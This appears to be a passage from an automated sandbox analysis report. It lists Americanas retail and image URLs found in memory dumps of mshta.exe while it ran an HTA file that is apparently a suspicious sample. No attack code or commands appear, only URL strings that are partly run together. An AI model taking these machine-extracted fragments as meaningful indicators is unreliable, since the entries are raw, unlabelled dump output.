mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398590694.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://www.americanas.com.br/categoria/eletrodomesticos/forno-de-embutir?chave=pfm_hm_tt_1_0_forno-mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438095878.0000000009C19000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410939908.000000000A94C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488441042.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432084842.0000000009C17000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466221929.000000000AC65000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.americanas.com.br/categoria/saude-e-bem-estar?chave=pfm_home_saude_menu(mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://ri.americanas.com/governanca-corporativa/estatuto-codigos-e-politicasmshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405052073.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490393750.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379435044.000000000B70A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                            unknown
                                            https://www.americanas.com.br/categoria/tv-e-home-theater?chave=pfm_home_tv_menudmshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://canaldedenuncias.com.br/universoamericanas/mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401062587.000000000AB51000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463326709.000000000AB55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487271254.000000000AB59000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25482925372.0000000006E90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380864273.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377966306.000000000AB45000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378109211.000000000ABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://www.americanas.com.br/categoria/moveis/sala-de-estar/cadeira?chave=pfm_hm_tt_1_0_cadeira-aqQmshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://empresas.americanas.com.br/?chave=brd_hm_mn_0_bottom_bndesmshta.exe, 00000000.00000003.25462631431.0000000009447000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443295751.00000000093E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487832586.000000000ABBB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487080902.000000000AAF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25435624253.0000000009C1D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404840319.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.americanas.com.br/categoria/brinquedos?chave=pfm_home_brinquedos_menugmshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.americanas.com.br/categoria/celularesHmshta.exe, 00000000.00000003.25444696283.000000000AAE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403359290.000000000AAE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.americanas.com.br/categoria/moveis?chave=dk_hm_at_moveismshta.exe, 00000000.00000003.25402097354.000000000AC33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479387385.0000000003003000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458855174.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398326236.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401903465.000000000AC27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478014141.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.pngrtmshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://images-americanas.b2w.io/spacey/acom/2024/12/09/sec-brinquedos_esporte-e-lazer-destaque-mob-mshta.exe, 00000000.00000003.25465970538.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426074668.0000000009C1B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466101017.0000000003074000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479770165.0000000003075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422689063.0000000009C1A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400515549.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438311238.0000000009C1C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384835381.0000000003018000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317721237.000000000678A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                              high
                                                              https://cliente.americanas.com.br/minhamshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463225262.000000000957C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://www.americanas.com.br/categoria/eletrodomesticos/coifa-e-depuradormshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460429722.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486497616.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                  high
                                                                  http://qna-v3-b2w.b2w.iolmshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.pngsamshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://informacoes.anatel.gov.br/paineis/certificacao-de-produtos/consulta-de-produtosLmshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://www.americanas.com.br/categoria/informatica/computadores-e-all-in-one/computador-gamer?chavemshta.exe, 00000000.00000002.25483197472.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460710979.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438921649.0000000009C41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394938920.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458855174.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410501035.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484353798.0000000009497000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.americanas.com.br/categoria/automotivo?chave=dk_hm_at_automotivo.mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.americanas.com.br/categoria/eletrodomesticos?chave=dk_hm_at_edommshta.exe, 00000000.00000003.25402097354.000000000AC33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401903465.000000000AC27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401838854.000000000AC13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.americanas.com.br/akam/13/7fa68b1eziSfmshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.americanas.com.br/especial/black-friday?chave=dk_hm_ft_00_09_blackfridaymshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465598138.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AA7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464016855.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398642519.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AA77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.png96648a2579.pmshta.exe, 00000000.00000003.25396464078.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443579320.00000000095A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409658561.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000095A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.pngdd69a1.pnmshta.exe, 00000000.00000003.25395346989.0000000009516000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411576650.000000000951C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398726849.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443915061.000000000951D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.americanas.com.br/categoria/moveis/quarto-completo?chave=pfm_hm_tt_1_0_quarto-completoamshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
